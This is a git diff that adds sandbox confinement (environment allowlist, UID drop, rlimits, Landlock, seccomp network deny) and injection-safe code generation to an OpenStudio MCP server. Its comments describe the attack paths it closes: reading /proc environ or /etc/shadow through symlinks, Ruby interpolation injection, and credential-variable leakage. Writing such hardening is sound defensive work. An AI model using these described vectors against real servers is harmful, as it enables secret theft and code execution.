"auto")) +# Network policy for confined subprocesses: deny (default) blocks outbound TCP +# once the seccomp backend lands; allow leaves it open (trusted/BCL deployments). +SANDBOX_NET = os.environ.get("OSMCP_SANDBOX_NET", "deny").strip().lower() + +# Wall-clock cap for a single simulation (run_osw/run_simulation). 0 = no cap. +SIM_TIMEOUT_SECONDS = _safe_float( + os.environ.get("OPENSTUDIO_MCP_SIM_TIMEOUT_SECONDS", + os.environ.get("OSMCP_SIM_TIMEOUT_SECONDS", "7200")), + 7200.0, +) + +# Unprivileged account confined subprocesses drop to (baked into the image as +# `sandbox`). See mcp_server/_sandbox_exec.py. +def _safe_sandbox_id(env_val: str, default: int) -> int: + """A positive uid/gid. Rejects <=0 (esp. 0=root) so a bad override can never + leave confined code running as root after the setuid 'drop'.""" + v = _safe_int(env_val, default) + return v if v > 0 else default + + +SANDBOX_UID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001) +SANDBOX_GID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001) + +# Per-tenant uid derivation (multi-user hardening). Every distinct remote caller +# (HTTP session / auth principal) gets its OWN sandbox uid so that: +# - RLIMIT_NPROC — which the kernel counts PER REAL UID — is a private budget, +# so one tenant's fork bomb can't starve every other tenant's runs; and +# - DAC isolates tenants' run dirs from each other even in the posix tier +# (no Landlock), since the dirs are chowned to, and processes run as, +# different uids. +# The local single user (stdio / off-request) keeps the baked-in SANDBOX_UID, +# preserving today's behavior. Derived uids sit above the system/sandbox range +# and below `nobody`, and are never root. +_PER_TENANT_UID_BASE = 2000 +_PER_TENANT_UID_SPAN = 60000 # uids 2000..61999 + + +def _derive_tenant_uid(key: str) -> int: + """Stable, process-independent uid for a tenant key. + + Uses hashlib (NOT the salted builtin hash()) so chown (server) and setuid + (shim, a separate process) derive the SAME uid for a request across restarts. + """ + import hashlib + digest = hashlib.sha256(key.encode("utf-8")).digest() + return _PER_TENANT_UID_BASE + (int.from_bytes(digest[:4], "big") % _PER_TENANT_UID_SPAN) + + +def sandbox_ids() -> tuple[int, int]: + """(uid, gid) the CURRENT caller's confined subprocess drops to. + + Resolved per-call from caller identity (same key in → same uid out, so a + request's prepare_workdir chown and the shim's setuid agree). LOCAL → the + baked SANDBOX_UID/GID; each remote tenant → its own derived uid (gid==uid). + """ + from mcp_server.identity import LOCAL, user_key + key = user_key() + if key == LOCAL: + return (SANDBOX_UID, SANDBOX_GID) + uid = _derive_tenant_uid(key) + return (uid, uid) + +# rlimit backstops for confined subprocesses (0 = off). Generous by design — they +# catch runaway bombs, not tune normal use. CPU/AS default off: a CPU-second cap +# would kill long annual sims, and RLIMIT_AS (virtual address space) breaks +# EnergyPlus/allocators — real memory control belongs to the container cgroup. +_GB = 1024 ** 3 +SANDBOX_RLIMIT_FSIZE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_FSIZE", str(10 * _GB)), 10 * _GB) +SANDBOX_RLIMIT_NPROC = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NPROC", "1024"), 1024) +SANDBOX_RLIMIT_NOFILE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NOFILE", "0"), 0) +SANDBOX_RLIMIT_CPU = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_CPU", "0"), 0) +SANDBOX_RLIMIT_AS = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_AS", "0"), 0) + # Shared roots are read-only for everyone; the only per-user writable area is # RUN_ROOT/ (see user_run_root). Writes elsewhere are denied. _SHARED_READ_ROOTS = [ diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py new file mode 100644 index 0000000..80bc85b --- /dev/null +++ b/mcp_server/sandbox.py @@ -0,0 +1,253 @@ +"""Confinement for the measure / simulation subprocesses (Codex-style, tiered). + +Everything an applied measure or a simulation runs goes through three subprocess +sites — `apply_measure`, `test_measure`, and the sim dispatcher's `_launch`. +They used to inherit the server's full environment via ``os.environ.copy()``. +This module is the single chokepoint that confines them. + +`OSMCP_SANDBOX` (config.SANDBOX_MODE) selects the mode (default `auto`): + off — full passthrough (explicit escape hatch for trusted/local-tooling use) + posix — clean-env allowlist + UID drop (when root) + rlimits + auto — best available: posix + Landlock FS policy + seccomp net-deny (Linux) + +`off` is a true passthrough so an operator can deliberately disable confinement +(the Codex ``danger-full-access`` model); the security PoC suite pins it to prove +the holes still exist when off. + +The unprivileged layers (clean-env, Landlock, seccomp, rlimits) apply even when +the server runs non-root; only the UID drop is root-gated and skipped otherwise. +`OSMCP_SANDBOX_NET=allow` opts out of the network deny. On a platform with no +kernel backend (macOS/Windows bare installs) `wrap_cmd` degrades to clean-env +only and warns once. `active_tier()` reports what is actually in effect so +degradation is visible (never silent). +""" +from __future__ import annotations + +import contextlib +import os +import sys +from pathlib import Path + +from mcp_server.config import ( + COMMON_MEASURES_DIR, + COMSTOCK_MEASURES_DIR, + SANDBOX_MODE, + SANDBOX_NET, + SANDBOX_RLIMIT_AS, + SANDBOX_RLIMIT_CPU, + SANDBOX_RLIMIT_FSIZE, + SANDBOX_RLIMIT_NOFILE, + SANDBOX_RLIMIT_NPROC, + SKILLS_DIR, + sandbox_ids, +) + +# Read-only roots the confined subprocess legitimately needs (Landlock grants +# read+exec here, nothing else; the run dir is the only writable path). Read-deny +# by default: anything not listed — another user's run, /tmp, arbitrary host +# files — is unreadable. Missing paths are skipped by the Landlock layer. +_FULL_MODES = ("auto", "full", "landlock") +# /proc is deliberately NOT granted (H1): with /proc readable a confined measure +# could read /proc//environ and, on a non-root server (measure uid == server +# uid), recover the server's secrets that clean-env stripped — including HTTP auth +# tokens — and inspect peer tenants' processes. OpenStudio/EnergyPlus run without +# it. /sys/<...> hardware info stays (no secrets; some libs read CPU topology). +_RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc", + "/opt/venv", "/usr/local", "/var/oscli", "/sys") + +# Specific device files the confined process needs — granted individually instead +# of the whole /dev directory. A `/dev` rw grant also exposes writable /dev/shm and +# /dev/mqueue (shared storage / IPC outside the run dir) and permits mknod. These +# are file-level Landlock rules, so only the file-access bits apply — no directory +# powers. Read-write: the bit-bucket + zero source; read-only: the entropy sources. +_DEV_RW = ("/dev/null", "/dev/zero") +_DEV_RO = ("/dev/urandom", "/dev/random") + +_warned_no_backend = False # one-shot log when no kernel backend (non-Linux) + +# Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately +# needs. Everything else — notably any host secret — is dropped in confined modes. +_ENV_ALLOW_EXACT = frozenset({ + "PATH", "HOME", "USER", "LANG", "LC_ALL", "TZ", "TERM", "RUBYOPT", + "RUBYLIB", "RUBY_VERSION", "ENERGYPLUS_EXE_PATH", + "OS_BUNDLER_VERSION", "RC_RELEASE", + "VENV_PATH", "PYTHONUNBUFFERED", + "COMSTOCK_MEASURES_DIR", "COMMON_MEASURES_DIR", "SKILLS_DIR", + "OSCLI_GEMFILE", "OSCLI_GEM_PATH", + "OSMCP_RUN_ROOT", "OPENSTUDIO_MCP_RUN_ROOT", + # Bundler / RubyGems config — EXPLICIT safe names only. A broad BUNDLE_/GEM_ + # prefix would leak credential vars (e.g. GEM_HOST_API_KEY, or per-host + # BUNDLE___ auth tokens) into untrusted measure code. + "BUNDLE_WITHOUT", "BUNDLE_PATH", "BUNDLE_GEMFILE", "BUNDLE_FROZEN", + "BUNDLE_DEPLOYMENT", "GEM_HOME", "GEM_PATH", + # Standard POSIX locale categories ONLY — enumerated, never prefix-matched: a + # bare LC_ prefix would also copy a host secret named e.g. LC_API_TOKEN. + "LC_CTYPE", "LC_NUMERIC", "LC_TIME", "LC_COLLATE", "LC_MONETARY", + "LC_MESSAGES", "LC_PAPER", "LC_NAME", "LC_ADDRESS", "LC_TELEPHONE", + "LC_MEASUREMENT", "LC_IDENTIFICATION", +}) +_ENV_ALLOW_PREFIXES: tuple[str, ...] = () # no prefix matching — exact names only + + +def enabled() -> bool: + """True when any confinement is active (i.e. OSMCP_SANDBOX is not 'off').""" + return SANDBOX_MODE not in ("", "off", "0", "false", "no") + + +def _full() -> bool: + """True when the full tier (Landlock FS + seccomp net-deny) is requested.""" + return SANDBOX_MODE in _FULL_MODES + + +def _has_backend() -> bool: + """True where the kernel confinement shim can run (Landlock/seccomp = Linux).""" + return sys.platform.startswith("linux") + + +def active_tier() -> str: + """The confinement tier actually in effect — surfaced in tool output.""" + if not enabled(): + return "off" + if not _has_backend(): + return "clean-env" # env stripping only; no kernel backend on this platform + return "landlock" if _full() else "posix" + + +def _ro_paths() -> list[str]: + """Read-only roots the confined subprocess may read/execute. + + /repo is deliberately NOT granted: the measure runs from the copied run dir, + and the shim imports mcp_server before applying Landlock — so the run never + needs to read the source tree (which could hold a host .env). + + INPUT_ROOT (/inputs) is deliberately NOT granted either: it is a SHARED, + multi-tenant dir, so granting it would let one tenant's confined measure read + another's inputs. Inputs are staged into the run dir before execution, so the + confined process reads the staged copy, never /inputs directly. + + The broad system roots (/etc, /proc, /sys) are intentional and DAC-mitigated: + OpenStudio/Ruby/EnergyPlus need bits of each (certs, nsswitch, /proc/self, + cpuinfo), and the uid-1001 drop means the kernel already blocks reads of + non-world-readable secrets (/etc/shadow) and other users' /proc//environ. + Landlock here is defense-in-depth on top of DAC, not the only barrier. + """ + return [ + *_RO_SYSTEM, + str(COMSTOCK_MEASURES_DIR), str(COMMON_MEASURES_DIR), + str(SKILLS_DIR), + ] + + +def build_env(work_dir: Path | str, *, redirect_tmp: bool = True) -> dict[str, str]: + """Environment for a confined subprocess. + + Disabled → full passthrough (``os.environ.copy()``), preserving today's + behaviour. Enabled → only allowlisted variables survive, so no host secret + reaches measure code. + + redirect_tmp (default) pins HOME/TMPDIR into work_dir/tmp, keeping temp + + caches inside the run dir so the Landlock backend (which makes only that dir + writable) permits them. Pass redirect_tmp=False for the non-Landlocked + test_measure path: pytest's capture uses an unlinked tempfile, which the + Docker-Desktop bind mount can't keep open — so it must stay on /tmp. + """ + if not enabled(): + return os.environ.copy() + env = { + k: v for k, v in os.environ.items() + if k in _ENV_ALLOW_EXACT or k.startswith(_ENV_ALLOW_PREFIXES) + } + if redirect_tmp: + work = Path(work_dir) + env["HOME"] = str(work) + tmp = work / "tmp" + try: + tmp.mkdir(parents=True, exist_ok=True) + env["TMPDIR"] = str(tmp) + except OSError: + pass + return env + + +def wrap_cmd(cmd: list[str], work_dir: Path | str, + extra_rw: tuple[str, ...] = ()) -> list[str]: + """Wrap a subprocess argv to run under the privilege-dropping exec shim. + + Disabled → returns the command unchanged (today's behaviour). Enabled → runs + it via `python3 -m mcp_server._sandbox_exec`, which drops to the unprivileged + sandbox uid (when root), applies rlimits, sets no_new_privs, then execs the + command (the pid is preserved so the dispatcher's kill-by-pid path still + works). Full tier additionally confines the filesystem (Landlock: read-only + system roots, writable only `work_dir` + `extra_rw`) and — unless + OSMCP_SANDBOX_NET=allow — denies outbound IP networking (seccomp). + + extra_rw: additional writable Landlock roots (e.g. a private TMPDIR off the + bind mount for tools that need unlinked tempfiles). + """ + if not enabled(): + return list(cmd) + if not _has_backend(): + # macOS/Windows bare installs: no kernel sandbox shim. Run unwrapped + # (clean-env from build_env still strips secrets); warn once. + global _warned_no_backend + if not _warned_no_backend: + print(f"[sandbox] no kernel confinement backend on {sys.platform}; " + "running unwrapped (clean-env only) — use the Docker image for " + "full FS/network confinement", file=sys.stderr) + _warned_no_backend = True + return list(cmd) + # Per-tenant uid/gid: each remote caller drops to its own uid (private NPROC + # budget + DAC isolation); the local single user keeps the base uid. Resolved + # here so it matches the chown prepare_workdir does for the same request. + uid, gid = sandbox_ids() + wrapped = [ + sys.executable, "-m", "mcp_server._sandbox_exec", + "--uid", str(uid), "--gid", str(gid), + ] + for flag, value in ( + ("--rlimit-fsize", SANDBOX_RLIMIT_FSIZE), + ("--rlimit-nproc", SANDBOX_RLIMIT_NPROC), + ("--rlimit-nofile", SANDBOX_RLIMIT_NOFILE), + ("--rlimit-cpu", SANDBOX_RLIMIT_CPU), + ("--rlimit-as", SANDBOX_RLIMIT_AS), + ): + if value and value > 0: + wrapped += [flag, str(value)] + if _full(): + for path in (*_ro_paths(), *_DEV_RO): + wrapped += ["--landlock-ro", path] + # rw: the run dir (+ caller extras) + the writable device FILES only — NOT + # the whole /dev dir (which would also expose writable /dev/shm, /dev/mqueue + # and permit mknod). See _DEV_RW / _DEV_RO above. + for path in (str(work_dir), *_DEV_RW, *extra_rw): + wrapped += ["--landlock-rw", path] + # Network deny is the default; OSMCP_SANDBOX_NET=allow opts out (trusted + # deployments that legitimately fetch e.g. BCL components). + if SANDBOX_NET != "allow": + wrapped += ["--seccomp-net"] + return [*wrapped, "--", *cmd] + + +def prepare_workdir(work_dir: Path | str) -> None: + """Hand the work dir to the sandbox account so the dropped process can write. + + No-op when confinement is off. The server is root, so it chowns the run dir + (recursively) to the sandbox uid before exec; the root server still reads the + outputs afterwards. Bind mounts that ignore ownership (e.g. Docker Desktop) + make this a harmless no-op there — confinement still holds for in-image paths. + """ + # Only the root server needs to hand the dir to the sandbox uid; when not root + # the shim keeps the current uid, which already owns the dir it created. + if not enabled() or not (hasattr(os, "geteuid") and os.geteuid() == 0): + return + work = Path(work_dir) + # Per-tenant uid/gid (matches the shim's setuid for this same request) so the + # dropped process owns its run dir and tenants are DAC-isolated from each other. + uid, gid = sandbox_ids() + # follow_symlinks=False (lchown): never let a symlink inside the dir redirect + # the chown to a target outside it (symlink-traversal privilege issue). + with contextlib.suppress(OSError): + os.chown(work, uid, gid, follow_symlinks=False) + for path in work.rglob("*"): + with contextlib.suppress(OSError): + os.chown(path, uid, gid, follow_symlinks=False) diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py index 5ef1ed9..5536df9 100644 --- a/mcp_server/skills/measure_authoring/operations.py +++ b/mcp_server/skills/measure_authoring/operations.py @@ -5,15 +5,19 @@ """ from __future__ import annotations +import contextlib import re import shutil import subprocess +import tempfile from pathlib import Path from typing import Any import openstudio -from mcp_server.config import INPUT_ROOT, user_run_root +from mcp_server import sandbox +from mcp_server.config import INPUT_ROOT, is_path_allowed, user_run_root +from mcp_server.util import read_file_bounded, reject_escaping_symlinks def custom_measures_dir() -> Path: @@ -28,6 +32,12 @@ def custom_measures_dir() -> Path: ] _MEASURE_NAME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]{0,99}$") +# Argument names become bare Ruby/Python identifiers in generated code — they must +# be plain identifiers, never arbitrary text (else code injection at generation). +# Must start lowercase/underscore: an uppercase-leading name (e.g. "Foo") is a Ruby +# *constant*, so `Foo = ...` inside a method is a "dynamic constant assignment" +# SyntaxError that breaks the generated Ruby measure. +_ARG_NAME_RE = re.compile(r"^[a-z_][a-zA-Z0-9_]{0,63}$") # Argument type -> SDK factory method name suffix _ARG_MAKERS = { @@ -81,8 +91,15 @@ def _to_class_name(snake: str) -> str: def _escape_ruby_str(s: str) -> str: - """Escape a string for safe embedding in a Ruby double-quoted string.""" - return s.replace("\\", "\\\\").replace('"', '\\"') + """Escape a string for safe embedding in a Ruby double-quoted string. + + Besides backslash and the closing quote, `#` MUST be escaped: in a Ruby + double-quoted literal `#{...}` (and `#@`, `#$`) is interpolation, so an + un-escaped `#` in user-controlled text (description / default / choice value) + is arbitrary Ruby execution when the generated measure runs `openstudio + measure -u`. `\\#` yields a literal `#`. + """ + return s.replace("\\", "\\\\").replace('"', '\\"').replace("#", "\\#") def _escape_python_str(s: str) -> str: @@ -90,6 +107,17 @@ def _escape_python_str(s: str) -> str: return s.replace("\\", "\\\\").replace('"', '\\"') +def _checked_arg_name(name: str) -> str: + """Validate an argument name as a plain identifier — it is emitted as a bare + Ruby/Python variable in generated code, so arbitrary text would be code + injection. Raises ValueError otherwise (callers wrap in ok:false).""" + if not isinstance(name, str) or not _ARG_NAME_RE.match(name): + raise ValueError( + "invalid argument name (must be a lowercase-leading identifier, " + f"matching [a-z_][a-zA-Z0-9_]*): {name!r}") + return name + + def _generate_ruby_arguments(args: list[dict]) -> str: """Generate Ruby arguments() method body.""" lines = [ @@ -97,28 +125,26 @@ def _generate_ruby_arguments(args: list[dict]) -> str: " args = OpenStudio::Measure::OSArgumentVector.new", ] for a in args: - name = a["name"] + name = _checked_arg_name(a["name"]) # bare Ruby identifier — validated, never raw text atype = a.get("type", "String") required = a.get("required", True) req_str = "true" if required else "false" maker = _ARG_MAKERS.get(atype, "String") if atype == "Choice" and "values" in a: - # Choice args require values at construction time - vals = a["values"] - choices_arr = ", ".join(f'"{v}"' for v in vals) + # Choice args require values at construction time (escape each value) lines.append(f" {name}_choices = OpenStudio::StringVector.new") - for v in vals: - lines.append(f' {name}_choices << "{v}"') + for v in a["values"]: + lines.append(f' {name}_choices << "{_escape_ruby_str(str(v))}"') lines.append(f' {name} = OpenStudio::Measure::OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})') else: lines.append(f' {name} = OpenStudio::Measure::OSArgument.make{maker}Argument("{name}", {req_str})') if "display_name" in a: - lines.append(f' {name}.setDisplayName("{a["display_name"]}")') + lines.append(f' {name}.setDisplayName("{_escape_ruby_str(str(a["display_name"]))}")') else: display = name.replace("_", " ").title() lines.append(f' {name}.setDisplayName("{display}")') if "description" in a: - lines.append(f' {name}.setDescription("{a["description"]}")') + lines.append(f' {name}.setDescription("{_escape_ruby_str(str(a["description"]))}")') if "default_value" in a: dv = a["default_value"] if atype == "Double": @@ -128,7 +154,7 @@ def _generate_ruby_arguments(args: list[dict]) -> str: elif atype == "Boolean": lines.append(f" {name}.setDefaultValue({str(dv).lower()})") else: - lines.append(f' {name}.setDefaultValue("{dv}")') + lines.append(f' {name}.setDefaultValue("{_escape_ruby_str(str(dv))}")') lines.append(f" args << {name}") lines += [" return args", " end"] return "\n".join(lines) @@ -141,27 +167,26 @@ def _generate_python_arguments(args: list[dict]) -> str: " args = openstudio.measure.OSArgumentVector()", ] for a in args: - name = a["name"] + name = _checked_arg_name(a["name"]) # bare Python identifier — validated, never raw text atype = a.get("type", "String") required = a.get("required", True) req_str = "True" if required else "False" maker = _ARG_MAKERS.get(atype, "String") if atype == "Choice" and "values" in a: - # Choice args require values at construction time - vals = a["values"] + # Choice args require values at construction time (escape each value) lines.append(f" {name}_choices = openstudio.StringVector()") - for v in vals: - lines.append(f' {name}_choices.append("{v}")') + for v in a["values"]: + lines.append(f' {name}_choices.append("{_escape_python_str(str(v))}")') lines.append(f' {name} = openstudio.measure.OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})') else: lines.append(f' {name} = openstudio.measure.OSArgument.make{maker}Argument("{name}", {req_str})') if "display_name" in a: - lines.append(f' {name}.setDisplayName("{a["display_name"]}")') + lines.append(f' {name}.setDisplayName("{_escape_python_str(str(a["display_name"]))}")') else: display = name.replace("_", " ").title() lines.append(f' {name}.setDisplayName("{display}")') if "description" in a: - lines.append(f' {name}.setDescription("{a["description"]}")') + lines.append(f' {name}.setDescription("{_escape_python_str(str(a["description"]))}")') if "default_value" in a: dv = a["default_value"] if atype == "Double": @@ -171,7 +196,7 @@ def _generate_python_arguments(args: list[dict]) -> str: elif atype == "Boolean": lines.append(f" {name}.setDefaultValue({dv!s})") else: - lines.append(f' {name}.setDefaultValue("{dv}")') + lines.append(f' {name}.setDefaultValue("{_escape_python_str(str(dv))}")') lines.append(f" args.append({name})") lines += [" return args"] return "\n".join(lines) @@ -181,7 +206,7 @@ def _generate_ruby_extraction(args: list[dict]) -> str: """Generate Ruby argument extraction lines for run() method.""" lines = [] for a in args: - name = a["name"] + name = _checked_arg_name(a["name"]) atype = a.get("type", "String") # Choice args are extracted as strings at runtime getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String") @@ -193,7 +218,7 @@ def _generate_python_extraction(args: list[dict]) -> str: """Generate Python argument extraction lines for run() method.""" lines = [] for a in args: - name = a["name"] + name = _checked_arg_name(a["name"]) atype = a.get("type", "String") # Choice args are extracted as strings at runtime getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String") @@ -476,13 +501,74 @@ def _update_measure_xml(measure_dir: Path, language: str): """ if language != "Ruby": return - try: - subprocess.run( - ["openstudio", "measure", "-u", str(measure_dir)], - capture_output=True, text=True, timeout=30, check=False, - ) - except (FileNotFoundError, subprocess.TimeoutExpired): - pass + # The directory may have been writable by untrusted test code. Never load a + # post-test measure script with the long-lived server's privileges. + symlink_error = reject_escaping_symlinks(measure_dir) + if symlink_error: + raise RuntimeError(symlink_error) + + with tempfile.TemporaryDirectory(prefix="osmcp_measure_xml_") as tmp: + staged_measure = Path(tmp) / measure_dir.name + shutil.copytree(measure_dir, staged_measure, symlinks=True) + run_env = sandbox.build_env(staged_measure) + sandbox.prepare_workdir(Path(tmp)) + try: + proc = subprocess.run( # noqa: S603 - argv is fixed and sandbox-wrapped + sandbox.wrap_cmd( + ["openstudio", "measure", "-u", str(staged_measure)], + staged_measure, + ), + cwd=str(staged_measure), + env=run_env, + capture_output=True, + text=True, + timeout=30, + check=False, + ) + except (FileNotFoundError, subprocess.TimeoutExpired): + return + + detail = "\n".join(part.strip() for part in (proc.stdout, proc.stderr) if part.strip()) + staged_xml = staged_measure / "measure.xml" + if proc.returncode != 0 or not staged_xml.is_file() or staged_xml.is_symlink(): + raise RuntimeError( + f"Failed to update measure.xml (exit {proc.returncode}): {detail[-1000:]}", + ) + + def _copy_generated(name: str, max_bytes: int) -> None: + source = staged_measure / name + if not source.exists(): + return + # Bounded, no-follow read: `measure -u` ran UNTRUSTED code (confined) + # that could have swapped the output for a symlink (-> a host secret) + # or a giant file. read_file_bounded uses O_NOFOLLOW and caps the read + # at max_bytes+1, so neither a TOCTOU symlink swap nor an oversized + # file reaches the unconfined server. + try: + data = read_file_bounded(source, max_bytes) + except ValueError as e: + raise RuntimeError( + f"Failed to update measure metadata: invalid generated {name}: {e}", + ) from e + temp_path: Path | None = None + with tempfile.NamedTemporaryFile( + dir=measure_dir, + prefix=f".{name}_", + delete=False, + ) as fh: + fh.write(data) + temp_path = Path(fh.name) + try: + # chmod is best-effort: replace() is the critical step, and some + # filesystems/mounts (or non-POSIX hosts) reject chmod. + with contextlib.suppress(OSError): + temp_path.chmod(0o644) + temp_path.replace(measure_dir / name) + finally: + temp_path.unlink(missing_ok=True) + + _copy_generated("measure.xml", 5_000_000) + _copy_generated("README.md", 5_000_000) def _add_intended_software_tools(measure_dir: Path): @@ -925,11 +1011,13 @@ def _test_reporting_measure_with_run( "run", "--postprocess_only", "-w", str(osw_path), ] log_path = run_dir / "openstudio.log" + run_env = sandbox.build_env(run_dir) + sandbox.prepare_workdir(run_dir) with log_path.open("w", encoding="utf-8") as log_f: proc = subprocess.run( - cmd, cwd=str(run_dir), + sandbox.wrap_cmd(cmd, run_dir), cwd=str(run_dir), stdout=log_f, stderr=subprocess.STDOUT, - env=os.environ.copy(), timeout=120, check=False, + env=run_env, timeout=120, check=False, ) log_text = log_path.read_text(encoding="utf-8", errors="replace") @@ -977,10 +1065,29 @@ def test_measure_op( 3. SystemD_baseline.osm from tests/assets or /inputs 4. No test_model.osm → test template falls back to empty Model.new() """ + _private_copy: Path | None = None try: mdir = Path(measure_dir) if not mdir.is_dir(): return {"ok": False, "error": f"Measure directory not found: {measure_dir}"} + # Access control: only test measures from allowed roots, and never stage a + # tree with an escaping symlink (test_measure chowns + Landlock-grants this + # dir, so an arbitrary path here is a privilege/secret-disclosure vector). + if not is_path_allowed(mdir): + return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"} + err = reject_escaping_symlinks(mdir) + if err: + return {"ok": False, "error": err} + + # If the measure isn't in the caller's OWN writable area (e.g. a bundled or + # otherwise shared read-only measure), copy it into a private run dir and test + # the copy. test_measure writes test_model.osm + chowns + Landlock-grants the + # dir, so it must never mutate shared/host content. Own-run-root measures are + # tested in place (the caller's to mutate; the measure.xml update persists). + if not is_path_allowed(mdir, write=True): + _private_copy = Path(tempfile.mkdtemp(prefix="measure_test_", dir=user_run_root())) + shutil.copytree(mdir, _private_copy, symlinks=True, dirs_exist_ok=True) + mdir = _private_copy # Detect language if (mdir / "measure.py").is_file(): @@ -1005,6 +1112,8 @@ def test_measure_op( src_model = None if model_path: src = Path(model_path) + if not is_path_allowed(src): + return {"ok": False, "error": f"model_path not allowed: {model_path}"} if src.is_file(): src_model = src if not src_model: @@ -1013,21 +1122,33 @@ def test_measure_op( shutil.copy2(str(src_model), str(test_model_dst)) if language == "Python": - proc = subprocess.run( - ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"], - cwd=str(mdir), - capture_output=True, text=True, timeout=60, check=False, - ) + test_cmd = ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"] else: # Run minitest directly (openstudio measure -r doesn't run minitest) test_files = list(test_dir.glob("*_test.rb")) if not test_files: return {"ok": False, "error": "No Ruby test files found"} + test_cmd = ["ruby", "-I", ".", str(test_files[0])] + + # Run the (untrusted) test code under the SAME confinement as apply_measure + # — UID drop, rlimits, Landlock, seccomp net-deny. TMPDIR is a private dir + # under the in-container /tmp (NOT mdir, which is on the Docker bind mount): + # pytest's capture uses an unlinked tempfile the bind mount can't keep open. + # It's granted to Landlock as an extra writable root and HOME stays in mdir. + tmp_dir = Path(tempfile.mkdtemp(prefix="osmcp_mtest_")) + try: + env = sandbox.build_env(mdir) # HOME=mdir (granted rw) + env["TMPDIR"] = str(tmp_dir) # off the bind mount, Landlock-granted below + sandbox.prepare_workdir(mdir) + sandbox.prepare_workdir(tmp_dir) proc = subprocess.run( - ["ruby", "-I", ".", str(test_files[0])], + sandbox.wrap_cmd(test_cmd, mdir, extra_rw=(str(tmp_dir),)), cwd=str(mdir), + env=env, capture_output=True, text=True, timeout=60, check=False, ) + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) output = proc.stdout + proc.stderr passed = failed = errors = 0 @@ -1064,20 +1185,32 @@ def test_measure_op( # Update measure.xml checksums — test_model.osm was added to tests/, # and any new files must be registered for OS App Measure Manager. - _update_measure_xml(mdir, language) - - return { + # Best-effort here: the (confined) test already ran and its pass/fail is + # the contract. A metadata-refresh failure (measure -u nonzero, or a + # rejected oversize/symlink output) is surfaced as a warning, NOT a test + # failure — confinement, not this call's exit code, is the security + # boundary, so a passing test must not be masked. (create/edit keep the + # raise: there the regenerated measure.xml IS the product.) + result = { "ok": proc.returncode == 0, "passed": passed, "failed": failed, "errors": errors, "test_output": display, } + try: + _update_measure_xml(mdir, language) + except RuntimeError as e: + result["metadata_warning"] = str(e) + return result except subprocess.TimeoutExpired: return {"ok": False, "error": "Test run timed out (60s)"} except Exception as e: return {"ok": False, "error": f"Failed to test measure: {e}"} + finally: + if _private_copy is not None: + shutil.rmtree(_private_copy, ignore_errors=True) def edit_measure_op( diff --git a/mcp_server/skills/measures/operations.py b/mcp_server/skills/measures/operations.py index f6b7438..73a4e41 100644 --- a/mcp_server/skills/measures/operations.py +++ b/mcp_server/skills/measures/operations.py @@ -16,10 +16,16 @@ import openstudio -from mcp_server.config import OSCLI_GEM_PATH, OSCLI_GEMFILE, user_run_root +from mcp_server import sandbox +from mcp_server.config import ( + OSCLI_GEM_PATH, + OSCLI_GEMFILE, + is_path_allowed, + user_run_root, +) from mcp_server.model_manager import get_model, load_model from mcp_server.skills.measures.osw_weather import resolve_osw_weather -from mcp_server.util import resolve_run_dir +from mcp_server.util import reject_escaping_symlinks, resolve_run_dir def list_measure_arguments(measure_dir: str) -> dict[str, Any]: @@ -142,6 +148,19 @@ def apply_measure( measure_path = Path(measure_dir) if not measure_path.is_dir(): return {"ok": False, "error": f"Measure directory not found: {measure_dir}"} + # Access control: only run measures from allowed roots (own run area or a + # shared read root — repo, inputs, bundled measures). Refuses arbitrary + # filesystem paths / another user's area before any copy or execution. + if not is_path_allowed(measure_path): + return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"} + + # Reject symlinks that escape the measure dir: copytree(symlinks=True) + # below preserves links instead of inlining target content, but a link + # pointing outside the measure root (e.g. -> /etc/shadow) must not be + # staged at all (it would leak host files into the readable run dir). + err = reject_escaping_symlinks(measure_path) + if err: + return {"ok": False, "error": err} # Check measure script exists (Ruby or Python) has_rb = (measure_path / "measure.rb").is_file() @@ -163,7 +182,9 @@ def apply_measure( measures_dir = run_dir / "measures" measures_dir.mkdir(exist_ok=True) local_measure = measures_dir / measure_path.name - shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True) + # symlinks=True: copy links AS links (don't follow → no host-file content + # inlined into the run dir); escaping links already rejected above. + shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True, symlinks=True) # Build measure step arguments measure_args = {} @@ -244,13 +265,18 @@ def apply_measure( "--bundle_without", "native_ext"] cmd += ["run", run_flag, "-w", str(osw_path)] log_path = run_dir / "openstudio.log" + # Build env first (it creates run_dir/tmp for TMPDIR as root), THEN hand + # the whole run dir — tmp included — to the sandbox uid, so the dropped + # process can write its temp/output. Order matters. + run_env = sandbox.build_env(run_dir) + sandbox.prepare_workdir(run_dir) with open(log_path, "w", encoding="utf-8") as log_f: proc = subprocess.run( - cmd, + sandbox.wrap_cmd(cmd, run_dir), cwd=str(run_dir), stdout=log_f, stderr=subprocess.STDOUT, - env=os.environ.copy(), + env=run_env, timeout=300, # 5 minute timeout check=False, ) diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py index 4ec5114..d8b537f 100644 --- a/mcp_server/skills/simulation/operations.py +++ b/mcp_server/skills/simulation/operations.py @@ -5,6 +5,7 @@ import json import os import shutil +import signal import subprocess import tempfile import threading @@ -17,6 +18,7 @@ import psutil +from mcp_server import sandbox from mcp_server.audit import audit from mcp_server.config import ( 